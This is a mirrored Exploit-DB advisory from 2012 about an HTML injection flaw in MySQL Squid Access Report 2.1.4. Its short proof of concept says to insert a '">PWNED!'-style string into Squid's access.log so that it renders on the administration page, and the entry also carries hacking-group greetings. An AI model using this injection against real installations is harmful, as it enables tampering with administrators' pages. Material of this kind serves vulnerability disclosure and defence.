exploit-db-mirror/exploits/php/webapps/20055.txt
Offensive Security d304cc3d3e DB: 2017-11-24
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

24 lines
No EOL
1,017 B
Text
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Exploit Title: MySQL Squid Access Report 2.1.4 / HTML Injection#
Date: 23/07/2012
# Author: Daniel Godoy
# Author Mail:DanielGodoy[at]GobiernoFederal[dot]com
# Author Web: www.delincuentedigital.com.ar
# Software web: http://sourceforge.net/projects/mysar/
# Tested on: Linux# Dork: MySQL Squid Access Report 2.1.4
# www.chap.cl
# Este Advisory fue reportado por Daniel Godoy, integrante deProject CHAP Security
# be secured /stay secure
# contacto@chap.cl 
[Comment]Greetz: Hernan Jais, Alfonso Cuevas, SPEED, hacklego, Incid3nt,Maximiliano Soler, Pablin77,_tty0,
Login-Root,Knet,Kikito,Duraznit0,InyeXion, ksha, zerial,LinuxFer,Scorp    her0, r0dr1 y demas user de RemoteExecution   
www.remoteexecution.info www.remoteexcution.com.ar   
#RemoteExecution Hacking Group   
[PoC]
find Squid's access.log file path and insert "> Example: ">PWNED!
http://server/mysar/www/?a=administration
-------------------------
Correo enviado por medio de MailMonstruo - www.mailmonstruo.com